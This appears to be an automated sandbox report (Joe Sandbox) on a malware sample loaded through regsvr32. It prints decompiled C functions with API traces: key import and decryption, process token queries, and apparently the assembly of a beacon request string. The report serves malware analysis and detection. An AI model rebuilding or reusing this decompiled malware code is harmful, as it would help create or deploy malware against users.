Associated: 00000003.00000002.581296737.00000000001E0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581561750.00000000001E9000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.581639255.00000000001EA000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581711524.00000000001EC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1e0000_regsvr32.jbxd

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: 036675359495961b245ca8f57dbc2bb71836807ef5d53658d93d77caf890bca7
Instruction ID: 89ce198ab5697fb70354e57408ef8454419a4e8e1c775c96f6cdb4574db00814
Opcode Fuzzy Hash: 036675359495961b245ca8f57dbc2bb71836807ef5d53658d93d77caf890bca7
Instruction Fuzzy Hash: 27F0B7B4200AC19BE7189BA5ECD9B1E7BA9BF48745B454014F9029FB60C730AC80DB21

Uniqueness

Uniqueness Score: -1.00%

Function 001E3D98, Relevance: 5.1, APIs: 4, Instructions: 70
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E001E3D98(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E001E6837(_t2);
				if(_t34 != 0) {
					_t30 = E001E6837(_t28);
					if(_t30 == 0) {
						E001E50CA(_t34);
					} else {
						_t39 = _a4;
						_t22 = E001E77DD(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E001E77DD(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}

0x001e3d98
0x001e3da2
0x001e3da4
0x001e3daa
0x001e3daa
0x001e3db3
0x001e3db7
0x001e3dc3
0x001e3dc7
0x001e3e3b
0x001e3dc9
0x001e3dc9
0x001e3dcd
0x001e3dd4
0x001e3dd7
0x001e3df1
0x001e3de0
0x001e3de0
0x001e3de4
0x001e3de7
0x001e3dec
0x001e3dec
0x001e3df6
0x001e3e1e
0x001e3e24
0x001e3e27
0x001e3df8
0x001e3dfa
0x001e3e02
0x001e3e0d
0x001e3e12
0x001e3e12
0x001e3e2e
0x001e3e35
0x001e3e36
0x001e3e36
0x001e3dc7
0x001e3e46

APIs

lstrlen.KERNEL32(00000000,0000EA60,?,00000008,?,?,001E3CEE,00000000,00000000,00000000,04E09698,?,?,001E106E,?,04E09698), ref: 001E3DA4

Part of subcall function 001E6837: RtlAllocateHeap.NTDLL(00000000,00000000,001E4197), ref: 001E6843

Part of subcall function 001E77DD: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,001E3DD2,00000000,00000001,00000001,?,?,001E3CEE,00000000,00000000,00000000,04E09698), ref: 001E77EB
Part of subcall function 001E77DD: StrChrA.SHLWAPI(?,0000003F,?,?,001E3CEE,00000000,00000000,00000000,04E09698,?,?,001E106E,?,04E09698,0000EA60,?), ref: 001E77F5

memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,001E3CEE,00000000,00000000,00000000,04E09698,?,?,001E106E), ref: 001E3E02
lstrcpy.KERNEL32(00000000,00000000), ref: 001E3E12
lstrcpy.KERNEL32(00000000,00000000), ref: 001E3E1E

Memory Dump Source

Source File: 00000003.00000002.581361082.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000003.00000002.581296737.00000000001E0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581561750.00000000001E9000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.581639255.00000000001EA000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581711524.00000000001EC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1e0000_regsvr32.jbxd

Similarity

API ID: lstrcpy$AllocateHeaplstrlenmemcpy
String ID:
API String ID: 3767559652-0
Opcode ID: 797b4c12f10b8f8c0564a5c4c89ffbf89efba39473261acd14bcafe6241e3f9c
Instruction ID: e464e900df75232c2bbabfe226c29dd3baf6546d2a0a2a14897ced99f5e364b4
Opcode Fuzzy Hash: 797b4c12f10b8f8c0564a5c4c89ffbf89efba39473261acd14bcafe6241e3f9c
Instruction Fuzzy Hash: 1421D2724046D5EBCB129FA6CC88AAF7FB8EF16380B554050F8049B212D730CE40C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 001E5D37, Relevance: 5.0, APIs: 4, Instructions: 39
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E001E5D37(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E001E6837(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}

0x001e5d4c
0x001e5d50
0x001e5d5a
0x001e5d61
0x001e5d64
0x001e5d66
0x001e5d6e
0x001e5d73
0x001e5d81
0x001e5d86
0x001e5d90

APIs

lstrlenW.KERNEL32(004F0053,?,74B05520,00000008,04E092FC,?,001E1B37,004F0053,04E092FC,?,?,?,?,?,?,001E20B0), ref: 001E5D47
lstrlenW.KERNEL32(001E1B37,?,001E1B37,004F0053,04E092FC,?,?,?,?,?,?,001E20B0), ref: 001E5D4E

Part of subcall function 001E6837: RtlAllocateHeap.NTDLL(00000000,00000000,001E4197), ref: 001E6843

memcpy.NTDLL(00000000,004F0053,74B069A0,?,?,001E1B37,004F0053,04E092FC,?,?,?,?,?,?,001E20B0), ref: 001E5D6E
memcpy.NTDLL(74B069A0,001E1B37,00000002,00000000,004F0053,74B069A0,?,?,001E1B37,004F0053,04E092FC), ref: 001E5D81

Memory Dump Source

Source File: 00000003.00000002.581361082.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000003.00000002.581296737.00000000001E0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581561750.00000000001E9000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.581639255.00000000001EA000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581711524.00000000001EC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1e0000_regsvr32.jbxd

Similarity

API ID: lstrlenmemcpy$AllocateHeap
String ID:
API String ID: 2411391700-0
Opcode ID: e9348eb46dc0d8aa5f6b7c51b9e0ec31fbeb37d2d979f9437896adff39ffc7bc
Instruction ID: 970e2f95a2f7fd6cdfaf004caa61a5a5ea71f1c8f2c6a80c6655d25b12e3e388
Opcode Fuzzy Hash: e9348eb46dc0d8aa5f6b7c51b9e0ec31fbeb37d2d979f9437896adff39ffc7bc
Instruction Fuzzy Hash: C5F03776900118BB8F10EBA9CC85C8E7BACEF183A47514062BA08D7212E731EA148BA0

Uniqueness

Uniqueness Score: -1.00%

Function 001E21C1, Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(04E087FA,00000000,00000000,00000000,001E7100,00000000), ref: 001E21D1
lstrlen.KERNEL32(?), ref: 001E21D9

Part of subcall function 001E6837: RtlAllocateHeap.NTDLL(00000000,00000000,001E4197), ref: 001E6843

lstrcpy.KERNEL32(00000000,04E087FA), ref: 001E21ED
lstrcat.KERNEL32(00000000,?), ref: 001E21F8

Memory Dump Source

Source File: 00000003.00000002.581361082.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000003.00000002.581296737.00000000001E0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581561750.00000000001E9000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.581639255.00000000001EA000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581711524.00000000001EC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1e0000_regsvr32.jbxd

Similarity

API ID: lstrlen$AllocateHeaplstrcatlstrcpy
String ID:
API String ID: 74227042-0
Opcode ID: 49b2f634323cf99a6f68d488822a2faf8f694b68e11f3460ad2415528ac7f9de
Instruction ID: e8fbba6923b2ae62e0d5d974588f540fa6d6cb4b83c19de514d19cb0ad88431c
Opcode Fuzzy Hash: 49b2f634323cf99a6f68d488822a2faf8f694b68e11f3460ad2415528ac7f9de
Instruction Fuzzy Hash: C1E0D8739016A16787119BE59C88C9FBBACFF997513440416FA00D7620C730DD45CBE1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: regsvr32.exe PID: 5236 Parent PID: 5056 regsvr32.exeCOMMON

Executed Functions

Function 00FB39C5, Relevance: 19.7, APIs: 13, Instructions: 163
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E00FB39C5(int __eax, intOrPtr _a4, int _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				int _v8;
				long* _v12;
				int _v16;
				BYTE* _v20;
				long* _v24;
				void* _v39;
				char _v40;
				void _v56;
				int _v60;
				intOrPtr _v64;
				void _v67;
				char _v68;
				void* _t61;
				int _t68;
				signed int _t76;
				int _t79;
				int _t81;
				int _t85;
				long _t86;
				int _t90;
				signed int _t94;
				int _t101;
				BYTE* _t102;
				int _t103;
				void* _t104;
				void* _t105;
				void* _t106;

				_t103 = __eax;
				_t94 = 6;
				_v68 = 0;
				memset( &_v67, 0, _t94 << 2);
				_t105 = _t104 + 0xc;
				asm("stosw");
				asm("stosb");
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				asm("stosb");
				_t61 =  *0xfba0dc( &_v24, 0, 0, 0x18, 0xf0000000); // executed
				if(_t61 == 0) {
					_a8 = GetLastError();
				} else {
					_t101 = 0x10;
					memcpy( &_v56, _a8, _t101);
					_t106 = _t105 + 0xc;
					_v60 = _t101;
					_v67 = 2;
					_v64 = 0x660e;
					_v68 = 8;
					_t68 = CryptImportKey(_v24,  &_v68, 0x1c, 0, 0,  &_v12); // executed
					if(_t68 == 0) {
						_a8 = GetLastError();
					} else {
						_push(0);
						_push( &_v40);
						_push(1);
						_push(_v12);
						if( *0xfba0b8() == 0) {
							_a8 = GetLastError();
						} else {
							_t18 = _t103 + 0xf; // 0x10
							_t76 = _t18 & 0xfffffff0;
							if(_a4 != 0 && _t76 == _t103) {
								_t76 = _t76 + _t101;
							}
							_t102 = E00FB6837(_t76);
							_v20 = _t102;
							if(_t102 == 0) {
								_a8 = 8;
							} else {
								_v16 = 0;
								_a8 = 0;
								while(1) {
									_t79 = 0x10;
									_v8 = _t79;
									if(_t103 <= _t79) {
										_v8 = _t103;
									}
									memcpy(_t102, _a12, _v8);
									_t81 = _v8;
									_a12 = _a12 + _t81;
									_t103 = _t103 - _t81;
									_t106 = _t106 + 0xc;
									if(_a4 == 0) {
										_t85 = CryptDecrypt(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8);
									} else {
										_t85 =  *0xfba0d4(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8, 0x20);
									}
									if(_t85 == 0) {
										break;
									}
									_t90 = _v8;
									_v16 = _v16 + _t90;
									_t102 =  &(_t102[_t90]);
									if(_t103 != 0) {
										continue;
									} else {
										L17:
										 *_a16 = _v20;
										 *_a20 = _v16;
									}
									goto L21;
								}
								_t86 = GetLastError();
								_a8 = _t86;
								if(_t86 != 0) {
									E00FB50CA(_v20);
								} else {
									goto L17;
								}
							}
						}
						L21:
						CryptDestroyKey(_v12);
					}
					CryptReleaseContext(_v24, 0);
				}
				return _a8;
			}

0x00fb39ce
0x00fb39d4
0x00fb39d7
0x00fb39dd
0x00fb39dd
0x00fb39df
0x00fb39e1
0x00fb39e4
0x00fb39ea
0x00fb39eb
0x00fb39ec
0x00fb39f2
0x00fb39f7
0x00fb39fd
0x00fb3a05
0x00fb3b62
0x00fb3a0b
0x00fb3a0d
0x00fb3a16
0x00fb3a1b
0x00fb3a2d
0x00fb3a30
0x00fb3a34
0x00fb3a3b
0x00fb3a3f
0x00fb3a47
0x00fb3b4d
0x00fb3a4d
0x00fb3a4d
0x00fb3a51
0x00fb3a52
0x00fb3a54
0x00fb3a5f
0x00fb3b39
0x00fb3a65
0x00fb3a65
0x00fb3a68
0x00fb3a6e
0x00fb3a74
0x00fb3a74
0x00fb3a7c
0x00fb3a80
0x00fb3a83
0x00fb3b2a
0x00fb3a89
0x00fb3a8f
0x00fb3a92
0x00fb3a95
0x00fb3a97
0x00fb3a9a
0x00fb3a9d
0x00fb3a9f
0x00fb3a9f
0x00fb3aa9
0x00fb3aae
0x00fb3ab1
0x00fb3ab4
0x00fb3ab6
0x00fb3abf
0x00fb3ae9
0x00fb3ac1
0x00fb3ad2
0x00fb3ad2
0x00fb3af1
0x00000000
0x00000000
0x00fb3af3
0x00fb3af6
0x00fb3af9
0x00fb3afd
0x00000000
0x00fb3aff
0x00fb3b0e
0x00fb3b14
0x00fb3b1c
0x00fb3b1c
0x00000000
0x00fb3afd
0x00fb3b01
0x00fb3b09
0x00fb3b0c
0x00fb3b23
0x00000000
0x00000000
0x00000000
0x00fb3b0c
0x00fb3a83
0x00fb3b3c
0x00fb3b3f
0x00fb3b3f
0x00fb3b54
0x00fb3b54
0x00fb3b6c

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,00FB4A23,00000001,00FB70D9,00000000), ref: 00FB39FD
memcpy.NTDLL(00FB4A23,00FB70D9,00000010,?,?,?,00FB4A23,00000001,00FB70D9,00000000,?,00FB62B1,00000000,00FB70D9,?,00000000), ref: 00FB3A16
CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 00FB3A3F
CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 00FB3A57
memcpy.NTDLL(00000000,00000000,05739630,00000010), ref: 00FB3AA9
CryptEncrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,05739630,00000020,?,?,00000010), ref: 00FB3AD2
CryptDecrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,05739630,?,?,00000010), ref: 00FB3AE9
GetLastError.KERNEL32(?,?,00000010), ref: 00FB3B01
GetLastError.KERNEL32 ref: 00FB3B33
CryptDestroyKey.ADVAPI32(00000000), ref: 00FB3B3F
GetLastError.KERNEL32 ref: 00FB3B47
CryptReleaseContext.ADVAPI32(?,00000000), ref: 00FB3B54
GetLastError.KERNEL32(?,?,?,00FB4A23,00000001,00FB70D9,00000000,?,00FB62B1,00000000,00FB70D9,?,00000000,00FB70D9,00000000,05739630), ref: 00FB3B5C

Memory Dump Source

Source File: 00000013.00000002.582912304.0000000000FB1000.00000020.00000001.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000013.00000002.582869993.0000000000FB0000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.582969975.0000000000FB9000.00000002.00000001.sdmp Download File
Associated: 00000013.00000002.583008145.0000000000FBA000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.583050936.0000000000FBC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_fb0000_regsvr32.jbxd

Similarity

API ID: Crypt$ErrorLast$Contextmemcpy$AcquireDecryptDestroyEncryptImportParamRelease
String ID:
API String ID: 1967744295-0
Opcode ID: f8ae9456801203a964d94e5ffa8dbfb021373557333b1cf3281acf80db599c1b
Instruction ID: 984012406176dffb698b80fc27b5a6d6900edad0464219b3be00f8315f5fa809
Opcode Fuzzy Hash: f8ae9456801203a964d94e5ffa8dbfb021373557333b1cf3281acf80db599c1b
Instruction Fuzzy Hash: 9A515C72944208FFDF109FAADC84AEEBBB9EB44390F108529F911E6150D7749E14EF21

Uniqueness

Uniqueness Score: -1.00%

Function 00FB2D06, Relevance: 10.6, APIs: 7, Instructions: 81
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 38%

			E00FB2D06(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E00FB6837(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E00FB50CA(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}

0x00fb2d13
0x00fb2d14
0x00fb2d15
0x00fb2d16
0x00fb2d17
0x00fb2d1b
0x00fb2d22
0x00fb2d31
0x00fb2d34
0x00fb2d37
0x00fb2d3e
0x00fb2d41
0x00fb2d44
0x00fb2d47
0x00fb2d4a
0x00fb2d55
0x00fb2d57
0x00fb2d60
0x00fb2d68
0x00fb2d6a
0x00fb2d7c
0x00fb2d86
0x00fb2d8a
0x00fb2d99
0x00fb2d9d
0x00fb2da6
0x00fb2dae
0x00fb2dae
0x00fb2db0
0x00fb2db0
0x00fb2db8
0x00fb2dbe
0x00fb2dc2
0x00fb2dc2
0x00fb2dcd

APIs

NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 00FB2D4D
NtOpenProcessToken.NTDLL(00000000,00000008,00000000), ref: 00FB2D60
NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,00000000), ref: 00FB2D7C

Part of subcall function 00FB6837: RtlAllocateHeap.NTDLL(00000000,00000000,00FB4197), ref: 00FB6843

NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,00000000), ref: 00FB2D99
memcpy.NTDLL(00000000,00000000,0000001C), ref: 00FB2DA6
NtClose.NTDLL(00000000), ref: 00FB2DB8
NtClose.NTDLL(00000000), ref: 00FB2DC2

Memory Dump Source

Source File: 00000013.00000002.582912304.0000000000FB1000.00000020.00000001.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000013.00000002.582869993.0000000000FB0000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.582969975.0000000000FB9000.00000002.00000001.sdmp Download File
Associated: 00000013.00000002.583008145.0000000000FBA000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.583050936.0000000000FBC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_fb0000_regsvr32.jbxd

Similarity

API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
String ID:
API String ID: 2575439697-0
Opcode ID: 040039771604da6ac37befa75b5fbf528d5e212563819328d19b7348a148210d
Instruction ID: 409cae8c84550e7546ffffd01660b35095b9efe2bc71da35c9569673aaba1cad
Opcode Fuzzy Hash: 040039771604da6ac37befa75b5fbf528d5e212563819328d19b7348a148210d
Instruction Fuzzy Hash: 2F21F4B290021DBBDB01AF95CC85ADEBFBDEF08750F104166FA04E6160D7B58A41AFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00FB46D1, Relevance: 33.3, APIs: 22, Instructions: 262
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 77%

			E00FB46D1(long __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a8, char** _a12, int* _a16, signed int _a20) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* __ebx;
				void* __edi;
				long _t63;
				intOrPtr _t64;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				void* _t71;
				intOrPtr _t72;
				int _t75;
				void* _t76;
				intOrPtr _t77;
				intOrPtr _t81;
				intOrPtr _t85;
				intOrPtr _t86;
				void* _t88;
				void* _t91;
				intOrPtr _t95;
				intOrPtr _t99;
				intOrPtr* _t101;
				void* _t102;
				void* _t107;
				intOrPtr _t111;
				signed int _t115;
				char** _t117;
				int _t120;
				signed int _t122;
				intOrPtr* _t123;
				intOrPtr* _t125;
				intOrPtr* _t127;
				intOrPtr* _t129;
				intOrPtr _t132;
				intOrPtr _t135;
				int _t138;
				intOrPtr _t139;
				int _t142;
				void* _t143;
				void* _t144;
				void* _t154;
				int _t157;
				void* _t158;
				void* _t159;
				void* _t160;
				intOrPtr _t161;
				void* _t163;
				long _t167;
				intOrPtr* _t168;
				intOrPtr* _t171;
				void* _t172;
				void* _t174;
				void* _t175;
				void* _t180;

				_t154 = __edx;
				_t144 = __ecx;
				_t63 = __eax;
				_t143 = _a20;
				_a20 = 8;
				if(__eax == 0) {
					_t63 = GetTickCount();
				}
				_t64 =  *0xfba018; // 0xff401b7a
				asm("bswap eax");
				_t65 =  *0xfba014; // 0x5cb11ae7
				asm("bswap eax");
				_t66 =  *0xfba010; // 0x15dc9586
				asm("bswap eax");
				_t67 =  *0xfba00c; // 0x8e03bf7
				asm("bswap eax");
				_t68 =  *0xfba2d4; // 0x477d5a8
				_t3 = _t68 + 0xfbb613; // 0x74666f73
				_t157 = wsprintfA(_t143, _t3, 3, 0x3d15c, _t67, _t66, _t65, _t64,  *0xfba02c,  *0xfba004, _t63);
				_t71 = E00FB6A09();
				_t72 =  *0xfba2d4; // 0x477d5a8
				_t4 = _t72 + 0xfbb653; // 0x74707526
				_t75 = wsprintfA(_t157 + _t143, _t4, _t71);
				_t174 = _t172 + 0x38;
				_t158 = _t157 + _t75;
				if(_a8 != 0) {
					_t139 =  *0xfba2d4; // 0x477d5a8
					_t8 = _t139 + 0xfbb65e; // 0x732526
					_t142 = wsprintfA(_t158 + _t143, _t8, _a8);
					_t174 = _t174 + 0xc;
					_t158 = _t158 + _t142;
				}
				_t76 = E00FB5040(_t144);
				_t77 =  *0xfba2d4; // 0x477d5a8
				_t10 = _t77 + 0xfbb302; // 0x6d697426
				_t159 = _t158 + wsprintfA(_t158 + _t143, _t10, _t76, _t154);
				_t81 =  *0xfba2d4; // 0x477d5a8
				_t12 = _t81 + 0xfbb7aa; // 0x5738d52
				_t180 = _a4 - _t12;
				_t14 = _t81 + 0xfbb2d7; // 0x74636126
				_t156 = 0 | _t180 == 0x00000000;
				_t160 = _t159 + wsprintfA(_t159 + _t143, _t14, _t180 == 0);
				_t85 =  *0xfba31c; // 0x57395e0
				_t175 = _t174 + 0x1c;
				if(_t85 != 0) {
					_t135 =  *0xfba2d4; // 0x477d5a8
					_t18 = _t135 + 0xfbb8da; // 0x3d736f26
					_t138 = wsprintfA(_t160 + _t143, _t18, _t85);
					_t175 = _t175 + 0xc;
					_t160 = _t160 + _t138;
				}
				_t86 =  *0xfba32c; // 0x57395b0
				if(_t86 != 0) {
					_t132 =  *0xfba2d4; // 0x477d5a8
					_t20 = _t132 + 0xfbb676; // 0x73797326
					wsprintfA(_t160 + _t143, _t20, _t86);
					_t175 = _t175 + 0xc;
				}
				_t161 =  *0xfba37c; // 0x5739630
				_t88 = E00FB2885(0xfba00a, _t161 + 4);
				_t167 = 0;
				_v12 = _t88;
				if(_t88 == 0) {
					L28:
					RtlFreeHeap( *0xfba290, _t167, _t143); // executed
					return _a20;
				} else {
					_t91 = RtlAllocateHeap( *0xfba290, 0, 0x800);
					_a8 = _t91;
					if(_t91 == 0) {
						L27:
						HeapFree( *0xfba290, _t167, _v12);
						goto L28;
					}
					E00FB2DD0(GetTickCount());
					_t95 =  *0xfba37c; // 0x5739630
					__imp__(_t95 + 0x40);
					asm("lock xadd [eax], ecx");
					_t99 =  *0xfba37c; // 0x5739630
					__imp__(_t99 + 0x40);
					_t101 =  *0xfba37c; // 0x5739630
					_t102 = E00FB624D(1, _t156, _t143,  *_t101); // executed
					_t163 = _t102;
					_v20 = _t163;
					asm("lock xadd [eax], ecx");
					if(_t163 == 0) {
						L26:
						HeapFree( *0xfba290, _t167, _a8);
						goto L27;
					}
					StrTrimA(_t163, 0xfb92ac);
					_push(_t163);
					_t107 = E00FB21C1();
					_v8 = _t107;
					if(_t107 == 0) {
						L25:
						HeapFree( *0xfba290, _t167, _t163);
						goto L26;
					}
					 *_t163 = 0;
					__imp__(_a8, _v12);
					_t168 = __imp__;
					 *_t168(_a8, _v8);
					_t111 = E00FB4AA6( *_t168(_a8, _t163), _a8);
					_a4 = _t111;
					if(_t111 == 0) {
						_a20 = 8;
						L23:
						E00FB1492();
						L24:
						HeapFree( *0xfba290, 0, _v8);
						_t167 = 0;
						goto L25;
					}
					_t115 = E00FB26C9(_t143, 0xffffffffffffffff, _t163,  &_v16); // executed
					_a20 = _t115;
					if(_t115 == 0) {
						_t171 = _v16;
						_t122 = E00FB161A(_t171, _a4, _a12, _a16); // executed
						_a20 = _t122;
						_t123 =  *((intOrPtr*)(_t171 + 8));
						 *((intOrPtr*)( *_t123 + 0x80))(_t123);
						_t125 =  *((intOrPtr*)(_t171 + 8));
						 *((intOrPtr*)( *_t125 + 8))(_t125);
						_t127 =  *((intOrPtr*)(_t171 + 4));
						 *((intOrPtr*)( *_t127 + 8))(_t127);
						_t129 =  *_t171;
						 *((intOrPtr*)( *_t129 + 8))(_t129);
						E00FB50CA(_t171);
					}
					if(_a20 != 0x10d2) {
						L18:
						if(_a20 == 0) {
							_t117 = _a12;
							if(_t117 != 0) {
								_t164 =  *_t117;
								_t169 =  *_a16;
								wcstombs( *_t117,  *_t117,  *_a16);
								_t120 = E00FB580E(_t164, _t164, _t169 >> 1);
								_t163 = _v20;
								 *_a16 = _t120;
							}
						}
						goto L21;
					} else {
						if(_a12 != 0) {
							L21:
							E00FB50CA(_a4);
							if(_a20 == 0 || _a20 == 0x10d2) {
								goto L24;
							} else {
								goto L23;
							}
						}
						_a20 = _a20 & 0x00000000;
						goto L18;
					}
				}
			}

0x00fb46d1
0x00fb46d1
0x00fb46d1
0x00fb46da
0x00fb46df
0x00fb46e6
0x00fb46e8
0x00fb46e8
0x00fb46f5
0x00fb4700
0x00fb4703
0x00fb470e
0x00fb4711
0x00fb4716
0x00fb4719
0x00fb471e
0x00fb4721
0x00fb472d
0x00fb473a
0x00fb473c
0x00fb4742
0x00fb4747
0x00fb4752
0x00fb4754
0x00fb4757
0x00fb475d
0x00fb475f
0x00fb4767
0x00fb4772
0x00fb4774
0x00fb4777
0x00fb4777
0x00fb4779
0x00fb4780
0x00fb4785
0x00fb4792
0x00fb4794
0x00fb4799
0x00fb47a1
0x00fb47a4
0x00fb47aa
0x00fb47b5
0x00fb47b7
0x00fb47bc
0x00fb47c1
0x00fb47c4
0x00fb47c9
0x00fb47d4
0x00fb47d6
0x00fb47d9
0x00fb47d9
0x00fb47db
0x00fb47e2
0x00fb47e5
0x00fb47ea
0x00fb47f4
0x00fb47f6
0x00fb47f6
0x00fb47f9
0x00fb4807
0x00fb480c
0x00fb4810
0x00fb4813
0x00fb49dd
0x00fb49e5
0x00fb49f2
0x00fb4819
0x00fb4825
0x00fb482d
0x00fb4830
0x00fb49cd
0x00fb49d7
0x00000000
0x00fb49d7
0x00fb483c
0x00fb4841
0x00fb484a
0x00fb485b
0x00fb485f
0x00fb4868
0x00fb486e
0x00fb4876
0x00fb487b
0x00fb4882
0x00fb488b
0x00fb4891
0x00fb49bd
0x00fb49c7
0x00000000
0x00fb49c7
0x00fb489d
0x00fb48a3
0x00fb48a4
0x00fb48ab
0x00fb48ae
0x00fb49af
0x00fb49b7
0x00000000
0x00fb49b7
0x00fb48b7
0x00fb48bd
0x00fb48c6
0x00fb48cf
0x00fb48da
0x00fb48e1
0x00fb48e4
0x00fb49f5
0x00fb4997
0x00fb4997
0x00fb499c
0x00fb49a7
0x00fb49ad
0x00000000
0x00fb49ad
0x00fb48ee
0x00fb48f5
0x00fb48f8
0x00fb48fd
0x00fb4908
0x00fb490d
0x00fb4910
0x00fb4916
0x00fb491c
0x00fb4922
0x00fb4925
0x00fb492b
0x00fb492e
0x00fb4933
0x00fb4937
0x00fb4937
0x00fb4943
0x00fb494f
0x00fb4953
0x00fb4955
0x00fb495a
0x00fb495c
0x00fb4961
0x00fb4966
0x00fb4973
0x00fb497b
0x00fb497e
0x00fb497e
0x00fb495a
0x00000000
0x00fb4945
0x00fb4949
0x00fb4980
0x00fb4983
0x00fb498c
0x00000000
0x00000000
0x00000000
0x00000000
0x00fb498c
0x00fb494b
0x00000000
